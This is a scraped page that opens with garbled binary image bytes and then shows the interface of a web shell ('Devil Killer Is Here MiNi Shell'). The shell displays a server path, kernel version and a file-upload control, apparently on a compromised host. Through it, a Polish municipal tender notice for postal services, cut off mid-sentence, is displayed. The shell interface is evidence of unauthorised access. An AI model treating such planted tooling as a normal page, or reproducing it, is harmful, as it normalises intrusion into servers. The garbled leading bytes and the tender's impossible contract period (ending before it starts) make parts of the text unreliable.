JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221108/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20221108/0042729401-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usług pocztowych w obrocie krajowym i zagranicznym dla Urzędu Miejskiego w Ostrowie Wielkopolskim </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA MIASTO OSTRÓW WIELKOPOLSKI</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 250855512</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">al. Powstańców Wielkopolskich 18</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Ostrów Wielkopolski</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">63-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL416 - Kaliski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@umostrow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://umostrow.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usług pocztowych w obrocie krajowym i zagranicznym dla Urzędu Miejskiego w Ostrowie Wielkopolskim </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f72c7afe-5f3b-11ed-8832-4e4740e186ac</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00427294</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-11-08</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00024795/09/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.10 Świadczenie usług pocztowych w obrocie krajowym i zagranicznym dla Urzędu Miejskiego w Ostrowie Wielkopolskim.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu komunikacja między zamawiającym a wykonawcą odbywa się przy użyciu:<br/>1) poczty elektronicznej, e-mail zamawiającego: zp@umostrow.pl (z wyjątkiem złożenia oferty, którą należy złożyć tylko i wyłącznie za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty lub wniosku dostępnego na ePUAP i udostępnionego również na miniPortalu, zgodnie z pkt 11.8. SWZ),<br/>2) miniPortalu https://miniportal.uzp.gov.pl/<br/>3) ePUAPu, dostępnego pod adresem https://epuap.gov.pl/wps/portal, adres skrytki zamawiającego: /MiastoOstrowWielkopolski/skrytka (wypełniając formularz do złożenia, zmiany, wycofania oferty oraz formularz do komunikacji w miejscu „wpisz dane odbiorcy” należy wpisać: Gmina Miejska Ostrów Wielkopolski).</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Przedmiotowe postępowanie można wyszukać na miniPortalu pod adresem https://miniportal.uzp.gov.pl/ na liście wszystkich postępowań lub wyszukując po numerze ogłoszenia BZP.<br/>2. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP, gdzie ma dostęp do: formularza do złożenia, zmiany, wycofania oferty oraz formularza do komunikacji. Formularze dostępne są również na miniPortalu.<br/>3. Dokumenty elektroniczne (inne niż oferta oraz załączniki do oferty), cyfrowe odwzorowania dokumentów oraz inne informacje składane są przez wykonawcę za pomocą poczty elektronicznej lub za pośrednictwem formularza do komunikacji (dostępnego na ePUAP oraz miniPortalu) jako załączniki.<br/>4. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy wynosi 150 MB.<br/>5. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, cyfrowych odwzorowań dokumentów oraz innych informacji przekazywanych przy ich użyciu opisane zostały w Instrukcji użytkownika systemu miniPortal-ePUAP zamieszczonej pod adresem https://miniportal.uzp.gov.pl/.<br/>6. Za datę przekazania dokumentów elektronicznych, cyfrowych odwzorowań dokumentów oraz innych informacji przyjmuje się: datę ich datę ich wpływu na skrzynkę odbiorczą e-mail zamawiającego lub przekazania na ePUAP (w zależności od sposobu komunikowania się).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WRM.RZP.271.73.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest świadczenie usług pocztowych w obrocie krajowym i zagranicznym dla Urzędu Miejskiego w Ostrowie Wielkopolskim, al. Powstańców Wielkopolskich 18 w zakresie przyjmowania, przemieszczania i doręczania przesyłek pocztowych oraz zwrotów przesyłek niedoręczonych, po wyczerpaniu możliwości ich doręczenia lub wydania odbiorcy, w rozumieniu ustawy z dnia 23 listopada 2012 r. Prawo pocztowe (Dz. U. z 2022 r., poz. 896).<br/>1.	Usługi będące przedmiotem zamówienia:<br/>1)	usługi pocztowe w obrocie krajowym i zagranicznym obejmujące przyjmowanie, przemieszczanie i doręczanie przesyłek pocztowych,<br/>2)	zwrot przesyłek niedoręczonych, po wyczerpaniu możliwości ich doręczenia lub wydania odbiorcy,<br/>3)	odbiór przez wykonawcę przesyłek pocztowych przeznaczonych do nadania z siedziby zamawiającego oraz ich przemieszczenie (przewóz) do placówki nadawczej wykonawcy, <br/>z zastrzeżeniem, że gdy siedziba placówki nadawczej wykonawcy obsługująca zamawiającego będzie zlokalizowana w odległości do 100 m od siedziby zamawiającego, zamawiający będzie dostarczał we własnym zakresie przesyłki przeznaczone do nadania do placówki wykonawcy.<br/>2.	Przez przesyłki pocztowe rozumie się:<br/>1)	przesyłki listowe o wadze do 2000 g (format S do 500 g, format M do 1000 g, format L do 2000 g - obrót krajowy; strefa A, B, C, D - obrót zagraniczny):<br/>a)	zwykłe ekonomiczne - przesyłki nierejestrowane nie będące przesyłkami najszybszej kategorii (obrót krajowy),<br/>b) zwykłe priorytetowe - przesyłki nierejestrowane będące przesyłkami najszybszej kategorii (obrót krajowy i zagraniczny),<br/>c)	polecone ekonomiczne - przesyłki rejestrowane nie będące przesyłkami najszybszej kategorii przyjęte za potwierdzeniem do nadania (obrót krajowy),<br/>d)	polecone priorytetowe - przesyłki rejestrowane najszybszej kategorii przyjęte za potwierdzeniem do nadania (obrót krajowy i zagraniczny),<br/>e)	polecone ekonomiczne za zwrotnym potwierdzeniem odbioru - przesyłki rejestrowane nie będące przesyłkami najszybszej kategorii przyjęte za potwierdzeniem nadania i doręczone za pokwitowaniem odbioru (obrót krajowy),<br/>f)	polecone priorytetowe za zwrotnym potwierdzeniem odbioru - przesyłki rejestrowane najszybszej kategorii przyjęte za potwierdzeniem nadania i doręczone za pokwitowaniem odbioru (obrót krajowy i zagraniczny),<br/>g)	z zadeklarowaną wartością ekonomiczne - przesyłki rejestrowane nie będące przesyłkami najszybszej kategorii, za których utratę, ubytek zawartości lub uszkodzenie wykonawca ponosi odpowiedzialność do wysokości wartości przesyłek podanej przez zamawiającego (obrót krajowy),<br/>h)	z zadeklarowaną wartością priorytetowe - przesyłki rejestrowane najszybszej kategorii za których utratę, ubytek zawartości lub uszkodzenie wykonawca ponosi odpowiedzialność do wysokości wartości przesyłek podanej przez zamawiającego (obrót krajowy i zagraniczny).<br/>Format S to przesyłki o wymiarach:<br/>minimum – wymiary strony adresowej nie mogą być mniejsze niż 90 x 140 mm <br/>maksimum – żaden z wymiarów nie może przekroczyć: wysokość 20 mm, długość 230 mm, <br/>szerokość 160 mm<br/>Format M to przesyłki o wymiarach: <br/>minimum - wymiary strony adresowej nie mogą być mniejsze niż 90 x 140 mm <br/>maksimum – żaden z wymiarów nie może przekroczyć: wysokość 20 mm, długość 325 mm,<br/>szerokość 230 mm<br/>Format L to przesyłki o wymiarach: <br/>minimum – wymiary strony adresowej nie mogą być mniejsze niż 90 x 140 mm <br/>maksimum – suma długości, szerokości i wysokości 900 mm, przy czym największy z tych wymiarów (długość) nie może przekroczyć 600 mm <br/>Strefa A - Europa (łącznie z Cyprem, cała Rosją i Izraelem)<br/>Strefa B - Ameryka Północna i Afryka<br/>Strefa C - Ameryka Południowa, Środkowa i Azja<br/>Strefa D - Australia i Oceania<br/>2)	paczki pocztowe o wadze do 10 kg obrót krajowy (gabaryt A i B) - przesyłki rejestrowane nie będące przesyłkami listowymi:<br/>a)	ekonomiczne - rejestrowane nie będące paczkami najszybszej kategorii, <br/>b)	priorytetowe - rejestrowane będące paczkami najszybszej kategorii, <br/>c)	z zadeklarowaną wartością ekonomiczne - rejestrowane nie będące paczkami najszybszej kategorii, za których utratę, ubytek zawartości lub uszkodzenie wykonawca ponosi odpowiedzialność do wysokości wartości paczek podanej przez zamawiającego, <br/>d)	z zadeklarowaną wartością priorytetowe – rejestrowane będące paczkami najszybszej kategorii, za których utratę, ubytek zawartości lub uszkodzenie wykonawca ponosi odpowiedzialność do wysokości wartości paczek podanej przez zamawiającego. <br/>Gabaryt A to paczki pocztowe o wymiarach: <br/>minimum - wymiary strony adresowej nie mogą być mniejsze niż 90 mm x 140 mm<br/>maksimum - żaden z wymiarów nie może przekroczyć: długość 600 mm, szerokość 500 mm, wysokość 300 mm<br/>Gabaryt B to paczki pocztowe o wymiarach:<br/>minimum - jeżeli choć jeden z wymiarów przekracza długość 600 mm, szerokość 500 mm, wysokość 300 mm<br/> maksimum - suma długości i największego obwodu mierzonego w innym kierunku niż długość wynosi 3000 mm, przy czym największy wymiar nie może przekroczyć 1500 mm<br/>3)	paczki pocztowe o wadze do 20 kg obrót zagraniczny (strefa A, B, C, D) - przesyłki rejestrowane nie będące przesyłkami listowymi:<br/>a)	ekonomiczne - rejestrowane nie będące paczkami najszybszej kategorii, <br/>b)	priorytetowe - rejestrowane będące paczkami najszybszej kategorii,<br/>c)	z zadeklarowaną wartością ekonomiczne - rejestrowane nie będące paczkami najszybszej kategorii, za których utratę, ubytek zawartości lub uszkodzenie wykonawca ponosi odpowiedzialność do wysokości wartości paczek podanej przez Zamawiającego, <br/>d)	z zadeklarowaną wartością priorytetowe - rejestrowane będące paczkami najszybszej kategorii, za których utratę, ubytek zawartości lub uszkodzenie wykonawca ponosi odpowiedzialność do wysokości wartości paczek podanej przez zamawiającego.<br/>Strefa A - Europa (łącznie z Cyprem, całą Rosją i Izraelem)<br/>Strefa B - Ameryka Północna i Afryka<br/>Strefa C - Ameryka Południowa, Środkowa i Azja<br/>Strefa D - Australia i Oceania<br/>W przypadku korzystania z usługi - paczka pocztowa (obrót krajowy i zagraniczny) zamawiający zastrzega sobie możliwość korzystania z dodatkowej usługi – potwierdzenia odbioru.<br/>4)	przesyłki kurierskie (obrót krajowy o wadze do 50 kg i obrót zagraniczny o wadze do 20 kg) – przesyłki listowe będące przesyłkami rejestrowanymi lub paczki pocztowe przyjmowane, przemieszczane i doręczane w sposób łącznie zapewniający:<br/>a)	bezpośredni odbiór przesyłki pocztowej od zamawiającego,<br/>b)	śledzenie przesyłki pocztowej od momentu nadania do doręczenia,<br/>c)	doręczenie przesyłki pocztowej w gwarantowanym terminie określonym w umowie, <br/>d)	doręczenie przesyłki pocztowej bezpośrednio do rąk adresata lub osoby uprawnionej do odbioru,<br/>e)	uzyskanie pokwitowania odbioru przesyłki pocztowej w formie pisemnej lub elektronicznej.<br/>Zamawiający wymaga, aby przesyłki kurierskie w obrocie krajowym nadane w dniach roboczych do godz. 1500 były doręczane w trzech gwarantowanych terminach:<br/>a)	zwykłym – doręczenie przesyłki nastąpi w gwarantowanym terminie doręczenia do drugiego dnia roboczego po dniu nadania – dot. przesyłek do 20 kg, których wymiary nie przekroczą 60 cm x 60 cm x 70 cm, <br/>b)	południowym – doręczenie przesyłki nastąpi w gwarantowanym terminie doręczenia w następnym dniu roboczym po dniu nadania do godziny 1200; usługa będzie świadczona w przypadku pozytywnej weryfikacji przez wykonawcę możliwości jej wykonania; usługa dotyczy przesyłek do 20 kg, których wymiary nie przekroczą 60 cm x 60 cm x 70 cm,<br/>c)	porannym - doręczenie przesyłki nastąpi w gwarantowanym terminie doręczenia w następnym dniu roboczym po dniu nadania do godziny 900; usługa będzie świadczona w przypadku pozytywnej weryfikacji przez wykonawcę możliwości jej wykonania; usługa dotyczy przesyłek do 20 kg, których wymiary nie przekroczą 60 cm x 60 cm x 70 cm.<br/>Pozostałe przesyłki kurierskie w obrocie krajowym, które wykonawca posiada w swoim asortymencie będą doręczane w gwarantowanych terminach określonych w regulaminie wykonawcy, przy czym wykonawca zapewni możliwość nadania przez zamawiającego przesyłek kurierskich o masie do 50 kg z zastrzeżeniem, że suma wymiarów przesyłki (długość/wysokość/szerokość) nie przekroczy 250 cm oraz że maksymalna długość poszczególnych wymiarów przesyłki nie przekroczy 120 cm.<br/>Dodatkowe usługi, które musi zapewnić wykonawca realizując usługę przesyłki kurierskie to: potwierdzenie odbioru.<br/>UWAGA:<br/>Zamawiający zastrzega sobie możliwość korzystania z innych dodatkowych usług dotyczących ww. przesyłek pocztowych nie wymienionych powyżej, a zawartych w cennikach wykonawcy.<br/>3.	Zamawiający wymaga od wykonawcy lub ewentualnego podwykonawcy, aby na podstawie stosunku pracy, o którym mowa w art. 22 § 1 ustawy z dnia 26 czerwca 1974 r. Kodeks pracy, zatrudnione były osoby zajmujące się bezpośrednio przyjmowaniem przesyłek do nadania od zamawiającego.<br/>4. Nie dopuszcza się składania ofert częściowych. Mimo, iż istnieją podmioty (firmy), które specjalizują się w świadczeniu usług pocztowych dot. przesyłek kurierskich lub paczek, dzielenie zamówienia na części nie jest zasadne ze względu na znikomą ilość ww. przesyłek wysyłanych w skali roku (w przypadku przesyłek kurierskich ok. 6 sztuk miesięcznie, w przypadku paczek ok. 2 sztuki miesięcznie). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">64110000-0 - Usługi pocztowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-01-01 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym,<br/>(zamawiający nie określa wymagań w tym zakresie)<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej,<br/>Warunek ten będzie spełniony, jeżeli wykonawca wykaże, że jest wpisany do rejestru operatorów pocztowych prowadzonego przez Prezesa Urzędu Komunikacji Elektronicznej zgodnie z art. 6 ust. 1 ustawy z dnia 23 listopada 2012 r. Prawo pocztowe (Dz. U. z 2022 r., poz. 896),<br/> UWAGA: W przypadku wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia, ww. warunek musi być spełniony przez co najmniej jednego z wykonawców, przy czym musi on zrealizować usługi będące przedmiotem zamówienia.<br/>3)	sytuacji ekonomicznej lub finansowej,<br/>(zamawiający nie określa wymagań w tym zakresie)<br/>4)	zdolności technicznej lub zawodowej<br/>Warunek ten będzie spełniony, jeżeli wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy – w tym okresie wykonywał bądź wykonuje co najmniej dwie usługi, rozumiane jako dwie umowy, w zakresie przyjmowania, przemieszczania i doręczania przesyłek pocztowych w obrocie krajowym i zagranicznym o wartości minimum 400.000,00 zł (słownie: czterysta tysięcy złotych 00/100) brutto każda.<br/>UWAGA: W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, warunek określony w pkt 7 ppkt 4 SWZ musi być spełniony w całości przez co najmniej jednego z wykonawców wspólnie ubiegających się o zamówienie. Natomiast w przypadku polegania na zasobach podmiotów trzecich, warunek określony w pkt 7 ppkt 4 SWZ musi być spełniony w całości wyłącznie przez jeden podmiot udostępniający zasoby. W obu przypadkach podmioty te muszą zrealizować usługi będące przedmiotem zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)	zaświadczenie o wpisie do rejestru operatorów pocztowych prowadzonego przez Prezesa Urzędu Komunikacji Elektronicznej – na spełnienie warunku o którym mowa w pkt 7 ppkt 2 SWZ,<br/>2)	załącznika nr 6, tj. wykaz usług wykonanych lub wykonywanych w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich przedmiotu, wartości, dat wykonania i podmiotów, na rzecz których usługi te zostały wykonane lub są wykonywane , z załączeniem dowodów określających czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy (na spełnienie warunku, o którym mowa w pkt 7 ppkt 4 SWZ).<br/>Uwaga: Wypełniając tabelę należy zaznaczyć poprzez podkreślenie, czy wymienione usługi są doświadczeniem własnym, czy doświadczeniem innego podmiotu. Zaznaczenie zwrotu „innego podmiotu” oznacza, że wykonawca spełniając warunek udziału w postępowaniu korzysta z doświadczenia innych podmiotów. W tym przypadku należy już do oferty dołączyć dokumenty, o których mowa w pkt 8.2. SWZ.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Jeżeli ofertę składają wykonawcy wspólnie ubiegający się o udzielenie zamówienia:<br/>1)	pełnomocnictwo do działania w imieniu tych wykonawców, z podaniem zakresu oraz imienia i nazwiska pełnomocnika, zgodnie z art. 58 ust. 2 Pzp,<br/>2)	każdy z wykonawców składa oddzielnie załącznik nr 2 do SWZ, tj. aktualne na dzień składania ofert oświadczenie o niepodleganiu wykluczeniu i o spełnianiu warunków udziału w 